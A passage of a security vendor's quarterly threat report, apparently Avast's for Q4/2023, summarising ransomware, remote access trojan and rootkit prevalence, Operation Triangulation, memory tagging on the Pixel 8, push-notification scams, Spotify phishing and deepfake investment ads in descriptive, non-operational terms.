<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="631" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/004-ransomware-blackcat-site-seized-1024x631.png" alt="" class="wp-image-7962" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/004-ransomware-blackcat-site-seized-1024x631.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/004-ransomware-blackcat-site-seized-300x185.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/004-ransomware-blackcat-site-seized-768x473.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/004-ransomware-blackcat-site-seized.png 1496w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Seized website of the BlackCat / ALPHV ransomware</figcaption></figure></div>
<p>Good employees are a scarce resource; that applies to the dark side employers as well. Hence, as soon as the rumors about BlackCat began, LockBit operators <a href="https://twitter.com/g0njxa/status/1734510597201404361" target="_blank" rel="noreferrer noopener">started to recruit</a> the members of the BlackCat gang.</p>
<p>The disruption operation did not stop BlackCat, however. New organizations have been attacked by the gang already <a href="https://twitter.com/CyberNews/status/1744716905632477222" target="_blank" rel="noreferrer noopener">in 2024</a>.</p>
<h6 class="wp-block-heading">Statistics</h6>
<p>The following stats show the most prevalent ransomware strains among our userbase. Percentages show the malware share of each strain:</p>
<ul>
<li>STOP (17%)</li>
<li>WannaCry (16%)</li>
<li>Enigma (9%)</li>
<li>TargetCompany (4%)</li>
<li>Cryptonite (2%)</li>
<li>LockBit (1%)</li>
</ul>
<p>This quarter, Enigma is the highest jumper, going up from 1% to over 9%. The complete world map with risk ratios is as follows:</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/005-ransomware-risk-ratio-Q4-2023-map-1024x639.png" alt="" class="wp-image-7963" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/005-ransomware-risk-ratio-Q4-2023-map-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/005-ransomware-risk-ratio-Q4-2023-map-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/005-ransomware-risk-ratio-Q4-2023-map-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/005-ransomware-risk-ratio-Q4-2023-map-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/005-ransomware-risk-ratio-Q4-2023-map-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Ransomware risk ratio in our userbase in Q4/2023</figcaption></figure></div>
<p>Since the previous quarter, the risk ratio in our user base shows a slight increase:</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/006-ransomware-risk-ratio-Q3-Q4-2023-1024x404.png" alt="" class="wp-image-7964" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/006-ransomware-risk-ratio-Q3-Q4-2023-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/006-ransomware-risk-ratio-Q3-Q4-2023-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/006-ransomware-risk-ratio-Q3-Q4-2023-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/006-ransomware-risk-ratio-Q3-Q4-2023-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/006-ransomware-risk-ratio-Q3-Q4-2023-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Comparation of the ransomware risk ratio in Q3/2023 and Q4/2023</figcaption></figure></div>
<p class="has-text-align-right"><em>Ladislav Zezula, Malware Researche</em>r<br><em>Jakub Křoustek, Malware Research Director</em></p>
<h3 class="wp-block-heading">Remote Access Trojans (RATs) </h3>
<p><em>A Remote Access Trojan (RAT) is a type of malicious software that allows unauthorized individuals to gain remote control over a victim’s computer or device. RATs are typically spread through social engineering techniques, such as phishing emails or infected file downloads. Once installed, RATs grant the attacker complete access to the victim’s device, enabling them to execute various malicious activities, such as spying, data theft, remote surveillance, and even taking control of the victim’s webcam and microphone.</em></p>
<p>Things in the realm of remote access trojans did not change much in Q4/2023. Regarding the daily activity of RATs, the statistics show a slightly decreasing trend when compared to Q3/2023 but this might be due to the holiday season when targeted users and RAT operators alike enjoy the time off.</p>
<p>An exciting event this year was the takedown of NetWire RAT at the beginning in Q1/2023. Let us look at what effect this takedown had on one of the bigger players at that time. Before the takedown in Q4/2022, NetWire RAT was number 7 on the most prevalent list, taking up over 4% of the malware share among RATs. In Q1/2023 its malware share went down to 3%. The takedown happened at the beginning of March, so it has not yet resulted in much impact. In Q2/2023 the share dropped further to 1.2%, and in the second half of 2023 the malware share stayed at 1% rendering NetWire RAT nearly irrelevant. We do not expect this strain to return to its earlier status.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-rat-daily_hits_normalized_2023_Q4_malware_rat_31_2023-10-01—2023-12-31-1024x404.png" alt="" class="wp-image-7965" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-rat-daily_hits_normalized_2023_Q4_malware_rat_31_2023-10-01—2023-12-31-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-rat-daily_hits_normalized_2023_Q4_malware_rat_31_2023-10-01—2023-12-31-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-rat-daily_hits_normalized_2023_Q4_malware_rat_31_2023-10-01—2023-12-31-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-rat-daily_hits_normalized_2023_Q4_malware_rat_31_2023-10-01—2023-12-31-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-rat-daily_hits_normalized_2023_Q4_malware_rat_31_2023-10-01—2023-12-31-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Daily risk ratio in our user base on RATs in Q4/2023</figcaption></figure></div>
<p>According to our data, Remcos seems to be the deciding factor in the risk ratio of each country while other strains have much smaller effects. The only exceptions are countries where HWorm is spread which is mainly the Middle East and Afghanistan, Pakistan, and India. As usual, the highest values of risk ratio are in Afghanistan, Iraq and Yemen and the factors are the activity of HWorm and to a far lesser extent the activity of njRAT. The largest increase in risk ratio in this quarter was seen in Romania (78%, Remcos and QuasarRAT), Lithuania (49%, Remcos, njRAT and Warzone) and Czechia (46%, Remcos and njRAT). North Macedonia, Uruguay and Portugal are countries with the largest decrease in risk ratio by -50% and it correlates to decreased activity of Remcos.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/03-rat-map_2023_Q4_malware_rat_31_2023-10-01—2023-12-31-1024x639.png" alt="" class="wp-image-7966" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/03-rat-map_2023_Q4_malware_rat_31_2023-10-01—2023-12-31-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/03-rat-map_2023_Q4_malware_rat_31_2023-10-01—2023-12-31-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/03-rat-map_2023_Q4_malware_rat_31_2023-10-01—2023-12-31-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/03-rat-map_2023_Q4_malware_rat_31_2023-10-01—2023-12-31-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/03-rat-map_2023_Q4_malware_rat_31_2023-10-01—2023-12-31-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Map showing global risk ratio for RATs in Q4/2023</figcaption></figure></div>
<p>We have <a href="https://x.com/AvastThreatLabs/status/1722195788758220824" target="_blank" rel="noreferrer noopener">tweeted</a> about one of the Remcos campaigns tricking users into installing fake Adobe Reader updates. Remcos was very active in October and then somewhat slowed down in November and December. We have also published a <a href="https://x.com/AvastThreatLabs/status/1722953843208577257" target="_blank" rel="noreferrer noopener">tweet</a> about another campaign using fake updates, this time pushing zgRAT, which according to our data is not very spread otherwise.</p>
<p>AsyncRat, currently number 4 on the top prevalent list, has increased its malware share by 30%. There are also two strains which more than doubled their malware share. One of these is XWorm, which has entered the top 10 list in this quarter. The other is SectopRAT which isn’t as prevalent, however there are reports of it working together with the Lumma password stealer.</p>
<p>The most prevalent remote access trojan strains in our userbase:</p>
<ul>
<li>HWorm</li>
<li>Remcos</li>
<li>njRAT</li>
<li>AsyncRat</li>
<li>QuasarRAT</li>
<li>Warzone</li>
<li>FlawedAmmyy</li>
<li>NanoCore</li>
<li>Gh0stCringe</li>
<li>XWorm</li>
</ul>
<p>The discovery of Krasue was probably the most frequent news topic in December. Krasue is a new Linux RAT discovered by <a href="https://www.group-ib.com/blog/krasue-rat/" target="_blank" rel="noreferrer noopener">Group-IB</a>. According to their report, this threat has been active since at least 2021 targeting organizations in Thailand. The malware holds a rootkit to hide its presence on a system, more specifically it contains 7 precompiled versions for various kernels. Another interesting feature is the use of the RTSP (Real Time Streaming Protocol) for C2 communication which is not very common.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="669" height="538" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/02-rat-krasue.png" alt="" class="wp-image-7967" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/02-rat-krasue.png 669w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/02-rat-krasue-300x241.png 300w" sizes="(max-width: 669px) 100vw, 669px" /><figcaption class="wp-element-caption">Embedded rootkit versions in Krasue</figcaption></figure></div>
<p>The <a href="https://blog.talosintelligence.com/new-sugargh0st-rat/" target="_blank" rel="noreferrer noopener">Cisco Talos</a> team recently spotted a new customized variant of Gh0st RAT. They call this variant SugarGh0st. Gh0st RAT is an old RAT with code publicly released in 2008 and over the years it has been frequently used by Chinese-speaking actors. Talos argues that a Chinese-speaking group might be running the current campaign as well although with low confidence. Among the added features compared to the original Gh0st RAT is looking for specific ODBC (Open Database Connectivity) registry keys, loading library files and changes made to evade earlier detections as well as slight modification of the C2 communication protocol. This is interesting evidence that although there are frequent reports of new RATs, the old and reliable are here to stay.</p>
<p>Two more strains were reported by CYFIRMA namely the <a href="https://www.cyfirma.com/outofband/unveiling-a-new-threat-the-millenium-rat/" target="_blank" rel="noreferrer noopener">Millenium RAT</a> and the <a href="https://www.cyfirma.com/outofband/a-gamer-turned-malware-developer-diving-into-silverrat-and-its-syrian-roots/" target="_blank" rel="noreferrer noopener">SilverRAT</a>. The Millenium RAT briefly appeared for sale on GitHub. It is interesting to note that the release on GitHub specified version 2.4 and version 2.5 followed shortly after. We were not able to find any reports or clues towards earlier versions. This might mean that 2.4 was the first version to go public or that it has been flying under the radar until now. CYFIRMA researchers said that this RAT is probably a derivative of the ToxicEye RAT. Regarding its features, it has the full package expected in a commodity RAT including keylogging, stealing sensitive data, and running commands.</p>
<p>SilverRAT seems to be a continuation of the S500 RAT since according to CYFIRMA it was developed by the same authors. This RAT is not new, it was first shared in 2022, but in Q4/2023 a cracked source code was leaked.</p>
<p class="has-text-align-right"><em>Ondřej Mokoš, Malware Researcher</em></p>
<h3 class="wp-block-heading">Rootkits</h3>
<p><em>Rootkits are malicious software specifically designed to gain unauthorized access to a system and obtain high-level privileges. Rootkits can operate at the kernel layer of a system, which grants them deep access and control including the ability to modify critical kernel structures. This could enable other malware to manipulate system behavior and evade detection.</em></p>
<p>The year-long analysis of rootkit activities reveals a persistent stagnation with a subtle descending trend. A minor peak was found in half of Q4/2024, although its significance is minimal.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-rootkits-2023_Q3-Q4_malware_rootkit-1024x404.png" alt="" class="wp-image-7968" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-rootkits-2023_Q3-Q4_malware_rootkit-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-rootkits-2023_Q3-Q4_malware_rootkit-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-rootkits-2023_Q3-Q4_malware_rootkit-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-rootkits-2023_Q3-Q4_malware_rootkit-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-rootkits-2023_Q3-Q4_malware_rootkit-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Rootkit risk ratio in Q3/2023 – Q4/2023</figcaption></figure></div>
<p>Notably, China constantly keeps its prominent position as a leader in rootkit activities. </p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/02-rootkits-map_2023_Q4-Q3_malware_rootkit-1024x639.gif" alt="" class="wp-image-7969" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/02-rootkits-map_2023_Q4-Q3_malware_rootkit-1024x639.gif 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/02-rootkits-map_2023_Q4-Q3_malware_rootkit-300x187.gif 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/02-rootkits-map_2023_Q4-Q3_malware_rootkit-768x479.gif 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/02-rootkits-map_2023_Q4-Q3_malware_rootkit-1536x958.gif 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/02-rootkits-map_2023_Q4-Q3_malware_rootkit-2048x1278.gif 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Global risk ratio for rootkits in Q3 and Q4 2023</figcaption></figure></div>
<p>Despite a consistent overall trend, an expansion in affected states is seen, particularly in Europe and Russian regions. Furthermore, a noteworthy occurrence in the Russian territory during the middle of the third quarter extended into the fourth quarter.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/03-rootkits-RU_2023_Q4_malware_rootkit-1024x404.png" alt="" class="wp-image-7970" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/03-rootkits-RU_2023_Q4_malware_rootkit-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/03-rootkits-RU_2023_Q4_malware_rootkit-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/03-rootkits-RU_2023_Q4_malware_rootkit-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/03-rootkits-RU_2023_Q4_malware_rootkit-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/03-rootkits-RU_2023_Q4_malware_rootkit-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Rootkit risk ratio in Q3/2023 – Q4/2023 in Russian territory</em></figcaption></figure></div>
<p>For several years, the dominant rootkit in the wild has been R77, a trend supported by comprehensive data displayed in a graph illustrating the prevalence of all rootkits, with a specific focus on R77.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/04-rootkits-2023_Q4_malware_rootkits-1024x404.png" alt="" class="wp-image-7971" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/04-rootkits-2023_Q4_malware_rootkits-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/04-rootkits-2023_Q4_malware_rootkits-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/04-rootkits-2023_Q4_malware_rootkits-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/04-rootkits-2023_Q4_malware_rootkits-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/04-rootkits-2023_Q4_malware_rootkits-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Globally rootkit activities vs. R77Rootkit in Q4/2023</figcaption></figure></div>
<p>Projections indicate that R77 will continue to be the most widespread rootkit soon. Its popularity stems from its uncomplicated implementation, operating on a user layer and offering fundamental functions akin to a classic rootkit in layer 0, consequently mitigating the risk of frequent Blue Screen of Death (BSOD) occurrences.</p>
<p>Additionally, approximately 20% of rootkits are standard tools, often utilized as support tools for other malware:</p>
<ul>
<li>R77Rootkit (48%)</li>
<li>Pucmeloun (7%)</li>
<li>Alureon (5%)</li>
<li>Bootkor (3%)</li>
<li>Perkesh (3%)</li>
<li>Cerbu (2%)</li>
</ul>
<p>In terms of Linux kernel rootkits, we continue tracking the cyberweapons of APT groups. For instance, we efficiently detected <a href="https://www.virustotal.com/gui/file/ccb32eef05aa570be137c6eb597776f6242010c181eb2eb4b7f1ccd7b10ad379" target="_blank" rel="noreferrer noopener">new samples</a> of Mélofée Linux kernel rootkit used by Chinese APT groups.</p>
<p>We want to highlight that we observed similar TTPs in other samples (e.g. <a href="https://www.virustotal.com/gui/file/990d33391f88ca19207c0a780ddf12c2fff72bc43d5a0a01baceb39172637112" target="_blank" rel="noreferrer noopener">Diamorphine kernel rootkit variant</a>) implementing simple functionality (hiding the module and the directories with the malicious content) with its hooks based on KProbes (notice that <a href="https://github.com/milabs/khook/blob/master/khook/internal.h%22%20%5Cl%20%22L12" target="_blank" rel="noreferrer noopener">KHook relies in KProbes</a>), compiled in Amazon Linux distributions and impersonating popular hardware manufacturer modules (e.g. Intel and Realtek).</p>
<p>We will continue tracking lightweight Linux kernel rootkits used by APT groups in the next quarter.</p>
<p class="has-text-align-right"><em><em>Martin Chlumecký</em>, Malware Researcher</em><br><em>David Álvarez, Malware Analyst</em></p>
<h3 class="wp-block-heading">Vulnerabilities and Exploits</h3>
<p><em>Exploits take advantage of flaws in legitimate software to perform actions that should not be allowed. They are typically categorized into remote code execution (RCE) exploits, which allow attackers to infect another machine, and local privilege escalation (LPE) exploits, which allow attackers to take more control of a partially infected machine.</em></p>
<p>In December 2023, Kaspersky researchers <a href="https://media.ccc.de/v/37c3-11859-operation_triangulation_what_you_get_when_attack_iphones_of_researchers" target="_blank" rel="noreferrer noopener">presented</a> more details about <a href="https://securelist.com/trng-2023/" target="_blank" rel="noreferrer noopener">Operation Triangulation</a> at the 37th Chaos Communication Congress conference. This attack, targeted at Kaspersky and other entities, utilized several zero-day exploits, starting with an iMessage zero-click. As Kaspersky managed to recover the whole infection chain, this research provides fascinating insights into the techniques employed by highly sophisticated nation state attackers. We learned that the attack featured not one, but two separate validator stages. These were supposed to protect the exploits (and implants) using public-key encryption and ensure that they are only deployed in the targeted environment. </p>
<p>Another interesting finding was that, when the attackers successfully exploited the kernel, they used their newfound privileges to just open Safari to run a browser exploit, essentially having to exploit the same device twice. At the first glance, dropping privileges like this doesn’t make much sense and it’s a bit of a mystery why the attack was designed like this. One theory is that the attackers had two chains and just wanted to take the best from both (the first one had the iMessage RCE, while the second one had the validators), so they decided to take the path of least resistance to connect them. However, we suspect this may also have been a deliberate attempt to protect the most expensive part of the attack: the zero-click iMessage exploit. If a victim discovered the malicious implant and attempted to trace back the infection, they would have most likely not found anything beyond the browser exploit, as no one would be crazy enough to suspect that a browser exploit chain would be initiated from the kernel. So, while the attackers would still get a lot of zero days burned, they would retain the most valuable one. Whatever the reason for the attack approach, one thing is for certain: this attacker must have no shortage of browser zero days if they are willing to risk burning one even when it’s unnecessary. </p>
<h6 class="wp-block-heading">MTE Support on Pixel 8</h6>
<p>Another interesting development happened in October, when Google’s Pixel 8 was released with <a href="https://googleprojectzero.blogspot.com/2023/11/first-handset-with-mte-on-market.html" target="_blank" rel="noreferrer noopener">support for MTE</a> (Memory Tagging Extensions). This represents a significant milestone, as this is the first commercially available device that supports this much-anticipated ARM mitigation. </p>
<p>While it’s not enabled by default, MTE can be turned on as a developer option for testing purposes. This allows developers to test if their application behaves correctly and that MTE does not cause any unexpected errors. The main idea behind MTE is to assign 4-bit tags to allocated 16-byte memory regions. Pointers are then supposed to contain the tag so that the tag can be checked when the pointer is dereferenced. If the pointer tag does not match the expected value, an exception can be thrown. This could potentially <a href="https://googleprojectzero.blogspot.com/2023/08/mte-as-implemented-part-1.html" target="_blank" rel="noreferrer noopener">mitigate a number of vulnerability classes</a>, like use after frees, as the tag is supposed to be updated between allocations, so the stale pointer’s tag would be outdated at the time the vulnerability is triggered (there is still a good chance that the tag will be valid, though, since there are only 16 possible tag values). </p>
<p>Currently, the actual impact of MTE on the difficulty of exploiting memory corruption vulnerabilities remains unclear; however, it seems like a promising mitigation, which might raise the bar for attackers. It’s also not clear if it will ever be enabled by default, as it will undoubtedly incur some performance overhead and the additional security might not be worth it for the average user. However, it might still come in handy for users who suspect they are targeted by zero-day capable attackers, since at a time when MTE is not widely enabled, its unexpected presence would likely catch most attackers off guard.</p>
<p class="has-text-align-right"><em>Jan Vojtěšek, Malware Reseracher</em></p>
<h2 class="wp-block-heading">Web Threats</h2>
<p>If we look at the detection statistics for the whole of last year, web threats were the most active category for 2023. Scams of different topics, and different quality thanks to the use of malvertising, have achieved a relatively large coverage worldwide. </p>
<p>Due to this, it is not surprising that scams, phishing, and malvertising formed over 75% of all threats blocked by us during the year.</p>
<p>A powerful and dangerous combination is the scam coupled with malvertising. As we will describe in this section, scammers have started to use many innovations from the ever-developing world of AI in hopes of improving their rate of success.</p>
<h3 class="wp-block-heading">Scams </h3>
<p><em>A scam is a type of threat that aims to trick users into giving an attacker their personal information or money. We track diverse types of scams which are listed below.</em></p>
<p>The malvertising business is booming thanks to the willingness of scammers to pay for delivery of their malicious content to victims. One could say that this willingness must come from the fact that scammers are getting their investments back from the money of the scammed users.</p>
<p>An interesting development is the increase in the activity of the scam threat, which started on 20 December and lasted until the end of the year.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4_malware_scam_31_2023-10-01—2023-12-31-1024x404.png" alt="" class="wp-image-7972" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4_malware_scam_31_2023-10-01—2023-12-31-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4_malware_scam_31_2023-10-01—2023-12-31-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4_malware_scam_31_2023-10-01—2023-12-31-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4_malware_scam_31_2023-10-01—2023-12-31-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4_malware_scam_31_2023-10-01—2023-12-31-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">General overview of Q4/2023 scam threat activity</figcaption></figure></div>
<p>The reason for this pre-holiday surge was an unfortunately successful push notification campaign. The campaign’s design, reminiscent of the famous CAPTCHA, encouraged users to allow push notifications to be sent from a given page.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="385" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/image-11-1024x385.png" alt="" class="wp-image-7973" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/image-11-1024x385.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/image-11-300x113.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/image-11-768x288.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/image-11.png 1257w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Example of simple look of this landing page</figcaption></figure></div>
<p>Avast consistently draws attention to the issue of scam push notifications. Last quarter, we warned about a massive increase in malvertising threats, an increase which continued in the fourth quarter of the year.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4_malware_malvertising_31_2023-10-01—2023-12-31-1024x404.png" alt="" class="wp-image-7974" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4_malware_malvertising_31_2023-10-01—2023-12-31-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4_malware_malvertising_31_2023-10-01—2023-12-31-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4_malware_malvertising_31_2023-10-01—2023-12-31-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4_malware_malvertising_31_2023-10-01—2023-12-31-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4_malware_malvertising_31_2023-10-01—2023-12-31-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Malvertising activity compared to the previous quarter</figcaption></figure></div>
<p>This promotion allows the scammer to take the user wherever he needs to go. From ordinary porn sites to financial scams, tech support scams, or even phishing sites.</p>
<p>A notable example is the phishing campaign shown below, which had its origin on a similar landing page where it convinced the user to allow sending push notifications. Typically, ads for adult content were then sent from this page. But then came a seemingly authentic ad campaign targeting Spotify users.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="362" height="359" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/GC1MVpyXEAAJ1lk-e1707148582379.png" alt="" class="wp-image-7975" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/GC1MVpyXEAAJ1lk-e1707148582379.png 362w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/GC1MVpyXEAAJ1lk-e1707148582379-300x298.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/GC1MVpyXEAAJ1lk-e1707148582379-150x150.png 150w" sizes="(max-width: 362px) 100vw, 362px" /><figcaption class="wp-element-caption">Example of scam push-notification</figcaption></figure></div>
<p>The phishing page continued to give the impression that it was a real Spotify page, as presented on the push notification pop-up, particularly the subscription renewal. It asked the user for a username and password, but also for credit card details including the verification code.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="1000" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/GC1MVpxXsAAhJVv-1024x1000.jpg" alt="" class="wp-image-7978" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/GC1MVpxXsAAhJVv-1024x1000.jpg 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/GC1MVpxXsAAhJVv-300x293.jpg 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/GC1MVpxXsAAhJVv-768x750.jpg 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/GC1MVpxXsAAhJVv.jpg 1276w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Phishing form page</figcaption></figure></div>
<p>Overall, the dividing line between phishing, scam and malvertising is very thin, and statistics are only confirming the common general growth of all these threats.</p>
<h3 class="wp-block-heading"><strong>Financial scams</strong></h3>
<p>A big attraction in the world of scams for the fourth quarter was the massive deployment of AI-generated videos in ads for financial/investment scams, which we pointed out and described in more detail in our last report. These videos were initially relatively low quality, but their quality gradually rose to a quite impressive level. </p>
<p>Scammers are still using known faces to lure users and entice people to click on the malicious links. Classics campaigns include the likes of Elon Musk, TV news reporters, and even presidents of countries. These advertisements use prestigious characters from the country where the advertisement is to be displayed. In the following examples, you can see a deepfake of the Czech President or Ursula von der Leyen introducing a new investment platform. </p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="644" height="604" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/PP_AI.gif" alt="" class="wp-image-7981"/><figcaption class="wp-element-caption">Deep fake video of the Czech President Petr Pavel promoting registration on the investment portal</figcaption></figure></div>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="685" height="824" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/von_der.png" alt="" class="wp-image-7982" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/von_der.png 685w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/von_der-249x300.png 249w" sizes="(max-width: 685px) 100vw, 685px" /><figcaption class="wp-element-caption">Deep fake video of Ursula von der Leyen introducing a new investment platform</figcaption></figure></div>
<p>We have also seen advertisements that used video images of famous characters that were embedded in an edited video to create the context for the introduction of a new product, but this is a different approach. Here, the overall impression created is much more believable, thanks to the fact that these generated videos explicitly speak certain text and mention specific names of fraudulent sites.<em> </em></p>
<p>Peak financial scam activity was observed in mid-November. Toward the end of the year, this activity slowly started to calm down.</p>
<div class="wp-block-image">
